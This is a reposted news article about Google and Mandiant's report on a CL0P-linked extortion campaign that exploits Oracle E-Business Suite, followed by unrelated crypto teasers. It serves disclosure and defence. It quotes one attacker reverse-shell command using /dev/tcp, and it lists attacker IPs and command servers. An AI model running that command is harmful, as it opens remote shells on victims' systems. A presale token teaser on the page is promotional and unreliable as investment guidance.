The post Google reports 'mass amounts of customer data' exploited in extortion campaign appeared on BitcoinEthereumNews.com. Google has reported a large-scale extraction of customer data by bad actors, who it claimed are involved in an extortion scheme. Google Threat Intelligence and Mandiant tracked the exploitation operation to attackers that might be associated with the CL0P extortion group. Google’s Threat Intelligence Group (GTIG) and Mandiant have brought an extensive extortion campaign that exploits the vulnerabilities in Oracle’s E-Business Suite (EBS) to light. The extortion campaign has resulted in the theft of large volumes of customer data. They said the operation began on September 29, 2025 and involved a group claiming ties to the CL0P extortion brand. Google and Mandiant reveal zero-day exploitation  According to Google’s report, the attackers sent a “high volume” of emails to executives across multiple organizations, alleging breaches of their Oracle EBS environments and threatening to publish stolen data unless a ransom was paid.  The emails, sent from hundreds of compromised third-party accounts, included contact addresses, support@pubstorm.com and support@pubstorm.net, previously linked to the CL0P data leak site. Google and Mandiant’s joint investigation found that the exploitation activity dates back to as early as July 2025, possibly linked to a zero-day vulnerability now tracked as CVE-2025-61882. In some cases, the attackers reportedly exfiltrated “a significant amount of data” from affected organizations. Oracle stated that the exploited flaws had been fixed in July, but later issued emergency updates on October 4 to address additional vulnerabilities. Oracle told its customers to use the latest critical patch updates and stressed that staying current on all patches is essential to prevent compromise. The CL0P extortion brand has been active since 2020 and is historically tied to the FIN11 cybercrime group. It has previously targeted managed file transfer systems like MOVEit, GoAnywhere, and Accellion FTA. Those campaigns followed a similar pattern of the mass exploitation of zero-day vulnerabilities, theft of… The post Google reports 'mass amounts of customer data' exploited in extortion campaign appeared on BitcoinEthereumNews.com. Google has reported a large-scale extraction of customer data by bad actors, who it claimed are involved in an extortion scheme. Google Threat Intelligence and Mandiant tracked the exploitation operation to attackers that might be associated with the CL0P extortion group. Google’s Threat Intelligence Group (GTIG) and Mandiant have brought an extensive extortion campaign that exploits the vulnerabilities in Oracle’s E-Business Suite (EBS) to light. The extortion campaign has resulted in the theft of large volumes of customer data. They said the operation began on September 29, 2025 and involved a group claiming ties to the CL0P extortion brand. Google and Mandiant reveal zero-day exploitation  According to Google’s report, the attackers sent a “high volume” of emails to executives across multiple organizations, alleging breaches of their Oracle EBS environments and threatening to publish stolen data unless a ransom was paid.  The emails, sent from hundreds of compromised third-party accounts, included contact addresses, support@pubstorm.com and support@pubstorm.net, previously linked to the CL0P data leak site. Google and Mandiant’s joint investigation found that the exploitation activity dates back to as early as July 2025, possibly linked to a zero-day vulnerability now tracked as CVE-2025-61882. In some cases, the attackers reportedly exfiltrated “a significant amount of data” from affected organizations. Oracle stated that the exploited flaws had been fixed in July, but later issued emergency updates on October 4 to address additional vulnerabilities. Oracle told its customers to use the latest critical patch updates and stressed that staying current on all patches is essential to prevent compromise. The CL0P extortion brand has been active since 2020 and is historically tied to the FIN11 cybercrime group. It has previously targeted managed file transfer systems like MOVEit, GoAnywhere, and Accellion FTA. Those campaigns followed a similar pattern of the mass exploitation of zero-day vulnerabilities, theft of…

Google reports 'mass amounts of customer data' exploited in extortion campaign

Google has reported a large-scale extraction of customer data by bad actors, who it claimed are involved in an extortion scheme. Google Threat Intelligence and Mandiant tracked the exploitation operation to attackers that might be associated with the CL0P extortion group.

Google’s Threat Intelligence Group (GTIG) and Mandiant have brought an extensive extortion campaign that exploits the vulnerabilities in Oracle’s E-Business Suite (EBS) to light. The extortion campaign has resulted in the theft of large volumes of customer data. They said the operation began on September 29, 2025 and involved a group claiming ties to the CL0P extortion brand.

Google and Mandiant reveal zero-day exploitation 

According to Google’s report, the attackers sent a “high volume” of emails to executives across multiple organizations, alleging breaches of their Oracle EBS environments and threatening to publish stolen data unless a ransom was paid. 

The emails, sent from hundreds of compromised third-party accounts, included contact addresses, [email protected] and [email protected], previously linked to the CL0P data leak site.

Google and Mandiant’s joint investigation found that the exploitation activity dates back to as early as July 2025, possibly linked to a zero-day vulnerability now tracked as CVE-2025-61882. In some cases, the attackers reportedly exfiltrated “a significant amount of data” from affected organizations.

Oracle stated that the exploited flaws had been fixed in July, but later issued emergency updates on October 4 to address additional vulnerabilities. Oracle told its customers to use the latest critical patch updates and stressed that staying current on all patches is essential to prevent compromise.

The CL0P extortion brand has been active since 2020 and is historically tied to the FIN11 cybercrime group. It has previously targeted managed file transfer systems like MOVEit, GoAnywhere, and Accellion FTA. Those campaigns followed a similar pattern of the mass exploitation of zero-day vulnerabilities, theft of sensitive data, and extortion weeks later. 

At the time of the report, no new victims from this incident had appeared on CL0P’s data leak site. 

Complex, multi-stage Java implants

Google and Mandiant’s technical breakdown reveals that the attackers used multiple exploit chains targeting Oracle EBS components, including UiServlet and SyncServlet, to achieve remote code execution and plant multi-stage Java implants.

In July 2025 there was suspicious activity that involved HTTP requests to /OA_HTML/configurator/UiServlet. This suspicious activity was observed in another exploit that later surfaced in a Telegram group named “SCATTERED LAPSUS$ HUNTERS.” 

The leaked exploit made use of several advanced techniques to gain control over targeted servers, such as a server-side request forgery (SSRF), an authentication bypass, and a XSL template injection.

By August 2025, the attackers began using another tool called SyncServlet to make and run harmful templates inside the EBS database. These templates contained Base64-encoded XSL payloads that loaded Java-based malware directly into memory. 

Among the identified implants were GOLDVEIN.JAVA, a downloader that retrieved second-stage payloads from attacker-controlled command servers, and a multi-layered chain dubbed SAGE, which installed persistent Java servlet filters for further exploitation.

After breaching the system, the attackers used the EBS account “applmgr” to explore the system, collect network and system details, and then install more malicious files. The attackers also used shell commands such as ip addr, netstat -an, and bash -i >& /dev/tcp/200.107.207.26/53 0>&1.

The IP addresses 200.107.207.26 and 161.97.99.49 were identified in exploitation attempts, while 162.55.17.215:443 and 104.194.11.200:443 were listed as command-and-control servers for the GOLDVEIN.JAVA payload.

GTIG has not formally linked the operation to any known group, but the campaign shares similarities with FIN11, which is a financially motivated cybercrime group that was previously associated with CL0P ransomware and large-scale data theft operations. 

Mandiant also noted that one of the compromised accounts used to send the extortion emails had been used in earlier FIN11-related attacks.

Users are urged to be suspicious of EBS database tables XDO_TEMPLATES_B and XDO_LOBS, especially those with names beginning with “TMP” or “DEF”, and to block external internet traffic from EBS servers to prevent more data extortion.

The organizations also recommend close monitoring of HTTP requests to endpoints like /OA_HTML/SyncServlet and /OA_HTML/configurator/UiServlet, and analyzing memory dumps for evidence of in-memory Java payloads.

Google warned that CL0P-linked groups will almost certainly continue to dedicate their resources to acquiring zero-day exploits.

Get seen where it counts. Advertise in Cryptopolitan Research and reach crypto’s sharpest investors and builders.

Source: https://www.cryptopolitan.com/google-reports-customer-data-exploited/

Market Opportunity
MASS Logo
MASS Price(MASS)
$0.0003815
$0.0003815$0.0003815
-5.33%
USD
MASS (MASS) Live Price Chart
Disclaimer: The articles reposted on this site are sourced from public platforms and are provided for informational purposes only. They do not necessarily reflect the views of MEXC. All rights remain with the original authors. If you believe any content infringes on third-party rights, please contact service@support.mexc.com for removal. MEXC makes no guarantees regarding the accuracy, completeness, or timeliness of the content and is not responsible for any actions taken based on the information provided. The content does not constitute financial, legal, or other professional advice, nor should it be considered a recommendation or endorsement by MEXC.
Tags:

You May Also Like

Ethereum unveils roadmap focusing on scaling, interoperability, and security at Japan Dev Conference

Ethereum unveils roadmap focusing on scaling, interoperability, and security at Japan Dev Conference

The post Ethereum unveils roadmap focusing on scaling, interoperability, and security at Japan Dev Conference appeared on BitcoinEthereumNews.com. Key Takeaways Ethereum’s new roadmap was presented by Vitalik Buterin at the Japan Dev Conference. Short-term priorities include Layer 1 scaling and raising gas limits to enhance transaction throughput. Vitalik Buterin presented Ethereum’s development roadmap at the Japan Dev Conference today, outlining the blockchain platform’s priorities across multiple timeframes. The short-term goals focus on scaling solutions and increasing Layer 1 gas limits to improve transaction capacity. Mid-term objectives target enhanced cross-Layer 2 interoperability and faster network responsiveness to create a more seamless user experience across different scaling solutions. The long-term vision emphasizes building a secure, simple, quantum-resistant, and formally verified minimalist Ethereum network. This approach aims to future-proof the platform against emerging technological threats while maintaining its core functionality. The roadmap presentation comes as Ethereum continues to compete with other blockchain platforms for market share in the smart contract and decentralized application space. Source: https://cryptobriefing.com/ethereum-roadmap-scaling-interoperability-security-japan/
Share
BitcoinEthereumNews2025/09/18 00:25
Silver Price Crash Is Over “For Real This Time,” Analyst Predicts a Surge Back Above $90

Silver Price Crash Is Over “For Real This Time,” Analyst Predicts a Surge Back Above $90

Silver has been taking a beating lately, and the Silver price hasn’t exactly been acting like a safe haven. After running up into the highs, the whole move reversed
Share
Captainaltcoin2026/02/07 03:15
Tapzi is Investors’ 1000x Pick in Volatile Market

Tapzi is Investors’ 1000x Pick in Volatile Market

The post Tapzi is Investors’ 1000x Pick in Volatile Market appeared on BitcoinEthereumNews.com. Crypto News 18 September 2025 | 00:05 Bitcoin swings after CPI data release as Tapzi’s presale gains momentum, emerging as a top crypto project in 2025. The crypto market moved sharply last week after the release of US Consumer Price Index (CPI) data. Bitcoin, the largest digital asset, reacted within minutes of the announcement, recording rapid swings before settling back near earlier levels.  At the same time, presale projects continued to attract investors, with Tapzi emerging as one of the most-watched tokens this month. It is being picked by investors as the next crypto to explode due to its high-growth potential in Tier 1 and Tier 2 countries, with Web3 gaming’s increasing adoption. Tapzi Presale Draws Attention While Bitcoin reacted to economic data, Tapzi’s presale has become a focal point among both retail and larger investors. Tapzi is a Web3 gaming platform designed to merge competitive gameplay with blockchain-based settlements. Players stake TAPZI tokens in head-to-head matches of chess, checkers, rock-paper-scissors, and tic-tac-toe. Winners receive tokens directly from prize pools funded by players, not by inflationary rewards. Don’t Watch the Wave – Ride It With $TAPZI! The presale opened with tokens priced at $0.0035. More than 27 million tokens have already been sold, with prices set to increase in each new stage. Analysts following the sale point to potential gains of around 300% once TAPZI lists on exchanges later this year. Liquidity locks and vesting schedules are in place to reduce the risks of sharp sell-offs after launch. This has placed Tapzi on the radar of investors searching for the best crypto to buy now. Bitcoin Price Reacts to CPI Last week, Bitcoin climbed toward $114,000 before jumping to $114,500, its highest level in weeks. The gains were short-lived as the price quickly dropped by $1,000. At press time, Bitcoin…
Share
BitcoinEthereumNews2025/09/18 06:26